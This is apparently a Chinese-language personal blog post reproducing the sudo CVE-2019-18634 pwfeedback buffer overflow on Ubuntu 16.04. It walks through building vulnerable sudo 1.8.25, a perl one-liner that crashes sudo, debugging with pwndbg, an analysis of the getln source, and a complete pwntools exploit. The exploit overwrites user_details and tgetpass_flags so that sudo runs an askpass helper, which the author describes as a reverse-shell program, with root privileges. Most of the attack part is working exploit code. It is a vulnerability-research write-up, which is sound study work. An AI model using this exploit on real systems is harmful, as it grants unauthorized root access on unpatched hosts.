Sudo CVE-2019-18634 复现

CVE-2019-18634

复现下sudo的一个cve

搭建环境

ubuntu 16.04 vmware 虚拟机

下载sudo-1.8.25源码并编译

1
2
3
4
5
6
7
wget https://www.sudo.ws/dist/sudo-1.8.25.tar.gz
tar -zxvf ./sudo-1.8.25.tar.gz
mkdir build
cd ./sudo-1.8.25
./configure --prefix=../build
make 
make install

编译好的程序会在build目录下的bin目录里

漏洞分析

要复现漏洞的话,要先开启sudo的pwfeedback 选项,这个选项就是sudo要求输入密码的时候,输进去的密码会有*显示,算是一种反馈吧:

1
2
ruan@ubuntu ~/cve/cve-2019-18634/build/bin  ./sudo ls         
Password: **********

开启的方法是在/etc/sudoers 文件中添加一行Defaults pwfeedback

poc

该poc 适用 sudo 1.8.25p1 以下的版本 :

1
perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id

程序奔溃:

1
2
3
4
 ✘ ruan@ubuntu  ~/cve/cve-2019-18634/build/bin  perl -e 'print(("A" x 100 . "\x{00}") x 50)' | ./sudo -S id   
Password: [1]    33771 done                              perl -e 'print(("A" x 100 . "\x{00}") x 50)' | 
       33772 segmentation fault (core dumped)  ./sudo -S id

调试

参考安全客文章里的调试代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import sys,os
from pwn import *

TARGET=os.path.realpath("./sudo")

#mfd, sfd = os.openpty()
#fd = os.open(os.ttyname(sfd), os.O_RDONLY)
fd = os.open("./poc",os.O_RDONLY)
#p = process([TARGET,"-S", "id"],stdin=fd)
p = process([TARGET,"-S","id"])
pause()
#payload = ("A"*100+"x15")*50
#os.write(mfd, payload+"n")
pause()
p.send(os.read(fd,0x2000)+'\n')
p.interactive()
sys.exit(0)

./poc的话就是perl -e 'print(("A" x 100 . "\x{00}") x 50)' > ./poc生成的

我们在第一个pause()的时候用gdb attach上去,sudo gdb attach pid,然后跑起来,gdb会断在程序奔溃处:

YGMz6O.png

出问题的是tgetpass.c文件里的getln函数

漏洞代码分析

getln函数源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
static char *
getln(int fd, char *buf, size_t bufsiz, int feedback)
{
    size_t left = bufsiz;
    ssize_t nr = -1;
    char *cp = buf;
    char c = '\0';
    debug_decl(getln, SUDO_DEBUG_CONV)

    if (left == 0) {
	errno = EINVAL;
	debug_return_str(NULL);		/* sanity */
    }

    while (--left) {
	nr = read(fd, &c, 1);
	if (nr != 1 || c == '\n' || c == '\r')
	    break;
	if (feedback) {	//我们开启了pwfeedback选项,所以会进入这里
	    if (c == sudo_term_kill) {
		while (cp > buf) {	// cp是已经读取的字符指针
		    if (write(fd, "\b \b", 3) == -1)	// 像fd写入"\b \b",消除一个字符
			break;
		    --cp;
		}
		left = bufsiz;	// 对left重新赋值
		continue;
	    } else if (c == sudo_term_erase) {
		if (cp > buf) {
		    if (write(fd, "\b \b", 3) == -1)
			break;
		    --cp;
		    left++;
		}
		continue;
	    }
	    ignore_result(write(fd, "*", 1));
	}
	*cp++ = c;
    }
    *cp = '\0';
    if (feedback) {
	/* erase stars */
	while (cp > buf) {
	    if (write(fd, "\b \b", 3) == -1)
		break;
	    --cp;
	}
    }

    debug_return_str_masked(nr == 1 ? buf : NULL);
}

出问题的就是在:

1
2
3
4
5
6
7
8
9
if (feedback) {	//我们开启了pwfeedback选项,所以会进入这里
	    if (c == sudo_term_kill) {
		while (cp > buf) {	// cp是已经读取的字符指针
		    if (write(fd, "\b \b", 3) == -1)	// 像fd写入"\b \b",消除一个字符
			break;
		    --cp;
		}
		left = bufsiz;	// 对left重新赋值
		continue;

sudo_term_kill的值可以调试得知:

1
2
3
pwndbg> p sudo_term_kill 
$1 = 0
pwndbg>

因为我们是通过管道传进来的字符串,但是管道是单向的,所以write(fd, "\b \b", 3)会返回-1,于是直接breakwhile (cp > buf)的循环,又对left进行了赋值,但是此时的cp并没有回到buf的头部,所以造成了溢出

在查看下buf是哪里的变量,从奔溃的栈布局可以知道是tgetpass函数调用了getln,源码里对应:

1
2
3
4
5
if (timeout > 0)
alarm(timeout);
   pass = getln(input, buf, sizeof(buf), ISSET(flags, TGP_MASK));
   alarm(0);
   save_errno = errno;

在向上看看,能找到对buf的定义:

1
2
3
4
5
6
7
8
9
char *
tgetpass(const char *prompt, int timeout, int flags,
    struct sudo_conv_callback *callback)
{
    struct sigaction sa, savealrm, saveint, savehup, savequit, saveterm;
    struct sigaction savetstp, savettin, savettou;
    char *pass;
    static const char *askpass;
    static char buf[SUDO_CONV_REPL_MAX + 1]; // 255+1
1
#define SUDO_CONV_REPL_MAX	255

buf是static变量,说明它是存放在数据区的:

1
2
3
4
5
6
7
8
pwndbg> p buf
$2 = 0x55cd781e58c0 <buf> 'A' <repeats 15 times>...
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x55cd77fbb000     0x55cd77fe2000 r-xp    27000 0      /home/ruan/cve/cve-2019-18634/build/bin/sudo
    0x55cd781e2000     0x55cd781e3000 r--p     1000 27000  /home/ruan/cve/cve-2019-18634/build/bin/sudo
    0x55cd781e3000     0x55cd781e5000 rw-p     2000 28000  /home/ruan/cve/cve-2019-18634/build/bin/sudo
    0x55cd781e5000     0x55cd781e6000 rw-p     1000 0		// buf在这里面

用ida打开我们编译的sudo程序,查看下buf变量下面都有些啥全局的变量:

YG84L8.png

这个好像用不同版本的gcc编译会有一些差别

可以看到的是,buf底下有user_details结构体,还有一个tgetpass_flags,先来看下这个tgetpass_flags

tgetpass函数里有一段:

1
2
3
4
5
6
/* If using a helper program to get the password, run it instead. */
    if (ISSET(flags, TGP_ASKPASS)) {
	if (askpass == NULL || *askpass == '\0')
	    sudo_fatalx(U_("no askpass program specified, try setting SUDO_ASKPASS"));
	debug_return_str_masked(sudo_askpass(askpass, prompt));
    }

如果设置了TGP_ASKPASS的flag,那程序就会fork出一个子进程去执行那个helper program

sudo_askpass函数里就用到了user_details这个结构:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
child = sudo_debug_fork();
   if (child == -1)
sudo_fatal(U_("unable to fork"));

   if (child == 0) {
/* child, point stdout to output side of the pipe and exec askpass */
if (dup2(pfd[1], STDOUT_FILENO) == -1) {
    sudo_warn("dup2");
    _exit(255);
}
if (setuid(ROOT_UID) == -1)
    sudo_warn("setuid(%d)", ROOT_UID);
if (setgid(user_details.gid)) {
    sudo_warn(U_("unable to set gid to %u"), (unsigned int)user_details.gid);
    _exit(255);
}
if (setuid(user_details.uid)) {
    sudo_warn(U_("unable to set uid to %u"), (unsigned int)user_details.uid);
    _exit(255);
}
closefrom(STDERR_FILENO + 1);
execl(askpass, askpass, prompt, (char *)NULL);
sudo_warn(U_("unable to run %s"), askpass);
_exit(255);
   }

子进程的权限通过user_details.uiduser_details.gid来设置,这两个值我们是可以通过这个漏洞改写掉的,也就是说我们可以通过这里用root权限来运行程序

思路

sudo有3次机会给我们输入密码

  • 设置环境变量SUDO_ASKPASS指定外部程序

  • 第一次用溢出把user_details覆盖掉,顺便把tgetpass_flags也给覆盖为 TGP_ASKPASS,启用askpass功能

  • 第二次输入密码的时候就会去执行外部的程序

踩坑

一开始我是从stdin给sudo输入数据,第一次溢出是可以的,第二次就不知道为什么不行,一只卡在read那里,无论输入什么都没有反应,而且从stdin输入数据的时候,sudo_term_kill一直为\x00,这样是没办法一次写入多个\x00只能写一个\x00字节进去。

后来还是选择从伪终端里输入数据,这样的话:

1
2
3
4
pwndbg> p/x sudo_term_kill 
$2 = 0x15
pwndbg> p/x sudo_term_erase 
$3 = 0x7f

我们就可以一次写入多个\x00

还有一个坑就是,我指定了SUDO_ASKPASS为shell脚本,但是执行的时候老是说找不到文件,后来换成程序就可以了。。。

最终:

1
2
3
4
 ruan@ubuntu  ~/cve/cve-2019-18634/build/bin  python debug.py DEBUG
[+] Starting local process '/home/ruan/cve/cve-2019-18634/build/bin/sudo' argv=['/home/ruan/cve/cve-2019-18634/build/bin/sudo', '-S', 'id']  env={'SUDO_ASKPASS': './test'} : pid 37602
[*] Paused (press any to continue)
[*] Paused (press any to continue)

YG5bb6.png

test程序是一个反弹shell的程序

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import sys,os
from pwn import *

TARGET=os.path.realpath("./sudo")

mfd, sfd = os.openpty()
fd = os.open(os.ttyname(sfd), os.O_RDONLY)

p = process([TARGET,"-S", "id"],stdin=fd,env={"SUDO_ASKPASS":"./test"})
pause()
payload = ("A"*0xfe+'\x15')*2+"A"*12+p64(0x6)+'\x00'*0x10
payload += p32(0xcafe)*5+p32(0)*3

os.write(mfd, payload+"\n")
pause()
p.interactive()

参考链接

CVE-2019-18634 sudo 提权漏洞分析

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

beginner